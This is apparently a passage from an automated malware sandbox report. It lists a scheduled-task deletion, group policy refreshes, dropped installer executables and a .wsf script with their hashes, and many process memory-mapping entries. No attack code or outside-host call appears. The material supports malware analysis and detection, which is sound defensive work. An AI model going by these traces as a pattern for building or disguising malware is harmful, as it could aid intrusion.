C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "jwkhvtMiulvJCTqog"4⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\7zSF039.tmp\Install.exeFilesize
6.3MB
MD55445f884c7d981b120692e51709f7298
SHA1867de2fc5c9ed08dd15d384ab26c23f9c8032a60
SHA256dfdb13191009faf502960b89645e465c29254fb90495a1d73ae06eb4ebae1475
SHA51212d3d8a35efe557a6a3e9794f30f079b1cb22666036d50e5636cf725a6f59d729258f167e1005d0a9aa20aeeb92f3ab2ee5479c061f818378f1e735846d716fc
-
C:\Users\Admin\AppData\Local\Temp\7zSF039.tmp\Install.exeFilesize
6.3MB
MD55445f884c7d981b120692e51709f7298
SHA1867de2fc5c9ed08dd15d384ab26c23f9c8032a60
SHA256dfdb13191009faf502960b89645e465c29254fb90495a1d73ae06eb4ebae1475
SHA51212d3d8a35efe557a6a3e9794f30f079b1cb22666036d50e5636cf725a6f59d729258f167e1005d0a9aa20aeeb92f3ab2ee5479c061f818378f1e735846d716fc
-
C:\Users\Admin\AppData\Local\Temp\7zSF3C2.tmp\Install.exeFilesize
6.9MB
MD52cbf7a5984ef2b3f36e26375ed9f8d12
SHA18aac7877150b79530bd87250a67685118a66b964
SHA25606ff91645cc2c770e71f8c2fde6875296bec5ce0bceda64b34b09c2b0bed5b60
SHA512e92a3a03bbf1622f950d57665339a9d73de98817335a6d6eac160b0d9365abb99ce71ca33cc670de343b13fcc5837613832e0d5223039c904b3e18835b8bc49b
-
C:\Users\Admin\AppData\Local\Temp\7zSF3C2.tmp\Install.exeFilesize
6.9MB
MD52cbf7a5984ef2b3f36e26375ed9f8d12
SHA18aac7877150b79530bd87250a67685118a66b964
SHA25606ff91645cc2c770e71f8c2fde6875296bec5ce0bceda64b34b09c2b0bed5b60
SHA512e92a3a03bbf1622f950d57665339a9d73de98817335a6d6eac160b0d9365abb99ce71ca33cc670de343b13fcc5837613832e0d5223039c904b3e18835b8bc49b
-
C:\Users\Admin\AppData\Local\Temp\MiBciKVvopIpRLyaf\lPAIFilFZOpRFIX\xEZriXn.exeFilesize
6.9MB
MD52cbf7a5984ef2b3f36e26375ed9f8d12
SHA18aac7877150b79530bd87250a67685118a66b964
SHA25606ff91645cc2c770e71f8c2fde6875296bec5ce0bceda64b34b09c2b0bed5b60
SHA512e92a3a03bbf1622f950d57665339a9d73de98817335a6d6eac160b0d9365abb99ce71ca33cc670de343b13fcc5837613832e0d5223039c904b3e18835b8bc49b
-
C:\Users\Admin\AppData\Local\Temp\MiBciKVvopIpRLyaf\lPAIFilFZOpRFIX\xEZriXn.exeFilesize
6.9MB
MD52cbf7a5984ef2b3f36e26375ed9f8d12
SHA18aac7877150b79530bd87250a67685118a66b964
SHA25606ff91645cc2c770e71f8c2fde6875296bec5ce0bceda64b34b09c2b0bed5b60
SHA512e92a3a03bbf1622f950d57665339a9d73de98817335a6d6eac160b0d9365abb99ce71ca33cc670de343b13fcc5837613832e0d5223039c904b3e18835b8bc49b
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msFilesize
7KB
MD5d016a61967e79f65b17f2943654c46d7
SHA1cc342089ef997fae9d07effb2ebf2c311ad69c78
SHA2560435d6b5b82326bda80b5e83fe0e168e8555e4052c2b346c6cc547c8b329432b
SHA512bb110a2cb7c0a12aaf2972816a6c89d50870caa356c3c79bafd73da4fb7c41a60629af003806c0e5f3812bdf0770c9853d34bfb49f8d6bf0ee60372afe03e279
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msFilesize
7KB
MD57869c98cf107dab384e4a41b9b48ce57
SHA1abf8bfab48c2083e2ba11e01fe814b4aac3a96de
SHA256cc1d839b88da0cfebdd56f6edd1fe6dc27f63bda32dd65988bc92ba567902222
SHA512d86ccca122449e9eec0b60d224ff308bbd0ff4719fab2424fa3f420657ed67eb907084848cb85ff94d33614144e3237834aec8c3cea3cf1d40b8a1dd540054b8
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msFilesize
7KB
MD582a2e4fd2c6f0400143110b0bbebcfa1
SHA17a7de38635dc70b2cb9f23eea550945b484dd753
SHA256239c2d59e04f0fc55f23d8eb6fcee823e9305c1d592c6523789914abb32eb270
SHA512f7da49c057bca2cf5559725541a249160fecdcbb750f4d8b1ef0489627cd0fbdbb194ef4580262b565c05faecc1ea7e8ece48ae4419119057119989e05908e2e
-
C:\Windows\Temp\UIFvrSrxAzeYKEuX\AfcMMHDW\LzNItXwhmmUUfkfi.wsfFilesize
8KB
MD5256deecaf2bdc5543d8f7cb458d6bfb6
SHA1adcecee62f8da50560ccd7ac7fe618efd67f765c
SHA2567916db241bc8e063fd59ba4032d5f725e31b17fd4c05e79ca779ba134e490d4c
SHA512043b8492e4a16bc8df60dae23a003c9d4e6ce91597afcfabbc8b9258571a3738b75dcb5354e1e4662b48dd5d0cf2a11426748dd238f46da6a7dea1fc031c015e
-
C:\Windows\Temp\UIFvrSrxAzeYKEuX\VEdIRfVaNlgFjwC\cVeHcqU.exeFilesize
6.9MB
MD52cbf7a5984ef2b3f36e26375ed9f8d12
SHA18aac7877150b79530bd87250a67685118a66b964
SHA25606ff91645cc2c770e71f8c2fde6875296bec5ce0bceda64b34b09c2b0bed5b60
SHA512e92a3a03bbf1622f950d57665339a9d73de98817335a6d6eac160b0d9365abb99ce71ca33cc670de343b13fcc5837613832e0d5223039c904b3e18835b8bc49b
-
C:\Windows\Temp\UIFvrSrxAzeYKEuX\VEdIRfVaNlgFjwC\cVeHcqU.exeFilesize
6.9MB
MD52cbf7a5984ef2b3f36e26375ed9f8d12
SHA18aac7877150b79530bd87250a67685118a66b964
SHA25606ff91645cc2c770e71f8c2fde6875296bec5ce0bceda64b34b09c2b0bed5b60
SHA512e92a3a03bbf1622f950d57665339a9d73de98817335a6d6eac160b0d9365abb99ce71ca33cc670de343b13fcc5837613832e0d5223039c904b3e18835b8bc49b
-
C:\Windows\system32\GroupPolicy\gpt.iniFilesize
268B
MD5a62ce44a33f1c05fc2d340ea0ca118a4
SHA11f03eb4716015528f3de7f7674532c1345b2717d
SHA2569f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA5129d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732
-
\Users\Admin\AppData\Local\Temp\7zSF039.tmp\Install.exeFilesize
6.3MB
MD55445f884c7d981b120692e51709f7298
SHA1867de2fc5c9ed08dd15d384ab26c23f9c8032a60
SHA256dfdb13191009faf502960b89645e465c29254fb90495a1d73ae06eb4ebae1475
SHA51212d3d8a35efe557a6a3e9794f30f079b1cb22666036d50e5636cf725a6f59d729258f167e1005d0a9aa20aeeb92f3ab2ee5479c061f818378f1e735846d716fc
-
\Users\Admin\AppData\Local\Temp\7zSF039.tmp\Install.exeFilesize
6.3MB
MD55445f884c7d981b120692e51709f7298
SHA1867de2fc5c9ed08dd15d384ab26c23f9c8032a60
SHA256dfdb13191009faf502960b89645e465c29254fb90495a1d73ae06eb4ebae1475
SHA51212d3d8a35efe557a6a3e9794f30f079b1cb22666036d50e5636cf725a6f59d729258f167e1005d0a9aa20aeeb92f3ab2ee5479c061f818378f1e735846d716fc
-
\Users\Admin\AppData\Local\Temp\7zSF039.tmp\Install.exeFilesize
6.3MB
MD55445f884c7d981b120692e51709f7298
SHA1867de2fc5c9ed08dd15d384ab26c23f9c8032a60
SHA256dfdb13191009faf502960b89645e465c29254fb90495a1d73ae06eb4ebae1475
SHA51212d3d8a35efe557a6a3e9794f30f079b1cb22666036d50e5636cf725a6f59d729258f167e1005d0a9aa20aeeb92f3ab2ee5479c061f818378f1e735846d716fc
-
\Users\Admin\AppData\Local\Temp\7zSF039.tmp\Install.exeFilesize
6.3MB
MD55445f884c7d981b120692e51709f7298
SHA1867de2fc5c9ed08dd15d384ab26c23f9c8032a60
SHA256dfdb13191009faf502960b89645e465c29254fb90495a1d73ae06eb4ebae1475
SHA51212d3d8a35efe557a6a3e9794f30f079b1cb22666036d50e5636cf725a6f59d729258f167e1005d0a9aa20aeeb92f3ab2ee5479c061f818378f1e735846d716fc
-
\Users\Admin\AppData\Local\Temp\7zSF3C2.tmp\Install.exeFilesize
6.9MB
MD52cbf7a5984ef2b3f36e26375ed9f8d12
SHA18aac7877150b79530bd87250a67685118a66b964
SHA25606ff91645cc2c770e71f8c2fde6875296bec5ce0bceda64b34b09c2b0bed5b60
SHA512e92a3a03bbf1622f950d57665339a9d73de98817335a6d6eac160b0d9365abb99ce71ca33cc670de343b13fcc5837613832e0d5223039c904b3e18835b8bc49b
-
\Users\Admin\AppData\Local\Temp\7zSF3C2.tmp\Install.exeFilesize
6.9MB
MD52cbf7a5984ef2b3f36e26375ed9f8d12
SHA18aac7877150b79530bd87250a67685118a66b964
SHA25606ff91645cc2c770e71f8c2fde6875296bec5ce0bceda64b34b09c2b0bed5b60
SHA512e92a3a03bbf1622f950d57665339a9d73de98817335a6d6eac160b0d9365abb99ce71ca33cc670de343b13fcc5837613832e0d5223039c904b3e18835b8bc49b
-
\Users\Admin\AppData\Local\Temp\7zSF3C2.tmp\Install.exeFilesize
6.9MB
MD52cbf7a5984ef2b3f36e26375ed9f8d12
SHA18aac7877150b79530bd87250a67685118a66b964
SHA25606ff91645cc2c770e71f8c2fde6875296bec5ce0bceda64b34b09c2b0bed5b60
SHA512e92a3a03bbf1622f950d57665339a9d73de98817335a6d6eac160b0d9365abb99ce71ca33cc670de343b13fcc5837613832e0d5223039c904b3e18835b8bc49b
-
\Users\Admin\AppData\Local\Temp\7zSF3C2.tmp\Install.exeFilesize
6.9MB
MD52cbf7a5984ef2b3f36e26375ed9f8d12
SHA18aac7877150b79530bd87250a67685118a66b964
SHA25606ff91645cc2c770e71f8c2fde6875296bec5ce0bceda64b34b09c2b0bed5b60
SHA512e92a3a03bbf1622f950d57665339a9d73de98817335a6d6eac160b0d9365abb99ce71ca33cc670de343b13fcc5837613832e0d5223039c904b3e18835b8bc49b
-
memory/316-174-0x0000000000000000-mapping.dmp
-
memory/544-84-0x0000000000000000-mapping.dmp
-
memory/548-173-0x0000000000000000-mapping.dmp
-
memory/548-157-0x0000000000000000-mapping.dmp
-
memory/556-74-0x0000000000000000-mapping.dmp
-
memory/576-145-0x0000000000000000-mapping.dmp
-
memory/628-156-0x0000000000000000-mapping.dmp
-
memory/696-77-0x0000000000000000-mapping.dmp
-
memory/696-158-0x0000000000000000-mapping.dmp
-
memory/740-100-0x0000000000000000-mapping.dmp
-
memory/740-128-0x0000000000000000-mapping.dmp
-
memory/804-105-0x0000000000000000-mapping.dmp
-
memory/828-175-0x0000000000000000-mapping.dmp
-
memory/832-143-0x0000000000000000-mapping.dmp
-
memory/836-81-0x0000000000000000-mapping.dmp
-
memory/884-177-0x0000000000000000-mapping.dmp
-
memory/924-148-0x0000000000000000-mapping.dmp
-
memory/944-103-0x0000000000000000-mapping.dmp
-
memory/960-56-0x0000000000000000-mapping.dmp
-
memory/976-108-0x0000000000000000-mapping.dmp
-
memory/976-111-0x0000000015DE0000-0x00000000170D0000-memory.dmpFilesize
18.9MB
-
memory/1028-87-0x0000000000000000-mapping.dmp
-
memory/1060-142-0x0000000000000000-mapping.dmp
-
memory/1124-80-0x0000000000000000-mapping.dmp
-
memory/1144-90-0x0000000000000000-mapping.dmp
-
memory/1168-117-0x0000000000000000-mapping.dmp
-
memory/1168-120-0x000007FEF4510000-0x000007FEF4F33000-memory.dmpFilesize
10.1MB
-
memory/1168-121-0x000007FEF38F0000-0x000007FEF444D000-memory.dmpFilesize
11.4MB
-
memory/1168-122-0x00000000023E4000-0x00000000023E7000-memory.dmpFilesize
12KB
-
memory/1168-124-0x00000000023E4000-0x00000000023E7000-memory.dmpFilesize
12KB
-
memory/1168-125-0x00000000023EB000-0x000000000240A000-memory.dmpFilesize
124KB
-
memory/1168-159-0x0000000000000000-mapping.dmp
-
memory/1184-181-0x000007FEF3A50000-0x000007FEF45AD000-memory.dmpFilesize
11.4MB
-
memory/1184-180-0x000007FEF45B0000-0x000007FEF4FD3000-memory.dmpFilesize
10.1MB
-
memory/1184-184-0x000000000272B000-0x000000000274A000-memory.dmpFilesize
124KB
-
memory/1184-183-0x0000000002724000-0x0000000002727000-memory.dmpFilesize
12KB
-
memory/1184-182-0x0000000002724000-0x0000000002727000-memory.dmpFilesize
12KB
-
memory/1196-167-0x0000000000000000-mapping.dmp
-
memory/1260-166-0x0000000000000000-mapping.dmp
-
memory/1376-147-0x0000000000000000-mapping.dmp
-
memory/1440-152-0x0000000000000000-mapping.dmp
-
memory/1440-131-0x0000000000000000-mapping.dmp
-
memory/1444-161-0x0000000000000000-mapping.dmp
-
memory/1444-139-0x0000000000000000-mapping.dmp
-
memory/1464-86-0x0000000000000000-mapping.dmp
-
memory/1476-169-0x0000000000000000-mapping.dmp
-
memory/1480-75-0x0000000000000000-mapping.dmp
-
memory/1484-172-0x0000000000000000-mapping.dmp
-
memory/1492-54-0x0000000075921000-0x0000000075923000-memory.dmpFilesize
8KB
-
memory/1524-165-0x0000000000000000-mapping.dmp
-
memory/1528-115-0x0000000000000000-mapping.dmp
-
memory/1528-171-0x0000000000000000-mapping.dmp
-
memory/1564-127-0x0000000000000000-mapping.dmp
-
memory/1588-146-0x0000000000000000-mapping.dmp
-
memory/1588-126-0x0000000000000000-mapping.dmp
-
memory/1596-191-0x0000000000FA0000-0x0000000002290000-memory.dmpFilesize
18.9MB
-
memory/1600-162-0x0000000000000000-mapping.dmp
-
memory/1620-92-0x0000000000000000-mapping.dmp
-
memory/1624-168-0x0000000000000000-mapping.dmp
-
memory/1652-164-0x0000000000000000-mapping.dmp
-
memory/1704-129-0x0000000000000000-mapping.dmp
-
memory/1712-150-0x0000000000000000-mapping.dmp
-
memory/1716-132-0x0000000000000000-mapping.dmp
-
memory/1724-99-0x000000001B7A0000-0x000000001BA9F000-memory.dmpFilesize
3.0MB
-
memory/1724-96-0x000007FEF49B0000-0x000007FEF53D3000-memory.dmpFilesize
10.1MB
-
memory/1724-97-0x000007FEF3E50000-0x000007FEF49AD000-memory.dmpFilesize
11.4MB
-
memory/1724-98-0x00000000029D4000-0x00000000029D7000-memory.dmpFilesize
12KB
-
memory/1724-95-0x000007FEFC371000-0x000007FEFC373000-memory.dmpFilesize
8KB
-
memory/1724-101-0x00000000029D4000-0x00000000029D7000-memory.dmpFilesize
12KB
-
memory/1724-102-0x00000000029DB000-0x00000000029FA000-memory.dmpFilesize
124KB
-
memory/1724-94-0x0000000000000000-mapping.dmp
-
memory/1740-140-0x0000000002474000-0x0000000002477000-memory.dmpFilesize
12KB
-
memory/1740-141-0x000000000247B000-0x000000000249A000-memory.dmpFilesize
124KB
-
memory/1740-136-0x000007FEF44A0000-0x000007FEF4EC3000-memory.dmpFilesize
10.1MB
-
memory/1740-138-0x000000001B7C0000-0x000000001BABF000-memory.dmpFilesize
3.0MB
-
memory/1740-133-0x0000000000000000-mapping.dmp
-
memory/1740-137-0x000007FEF3880000-0x000007FEF43DD000-memory.dmpFilesize
11.4MB
-
memory/1812-151-0x0000000000000000-mapping.dmp
-
memory/1896-144-0x0000000000000000-mapping.dmp
-
memory/1896-123-0x0000000000000000-mapping.dmp
-
memory/1924-176-0x0000000000000000-mapping.dmp
-
memory/1936-163-0x0000000000000000-mapping.dmp
-
memory/1940-160-0x0000000000000000-mapping.dmp
-
memory/1948-116-0x0000000000000000-mapping.dmp
-
memory/1968-170-0x0000000000000000-mapping.dmp
-
memory/1972-149-0x0000000000000000-mapping.dmp
-
memory/1992-155-0x0000000000000000-mapping.dmp
-
memory/2004-73-0x0000000017740000-0x0000000018A30000-memory.dmpFilesize
18.9MB
-
memory/2004-64-0x0000000000000000-mapping.dmp
-
memory/2008-130-0x0000000000000000-mapping.dmp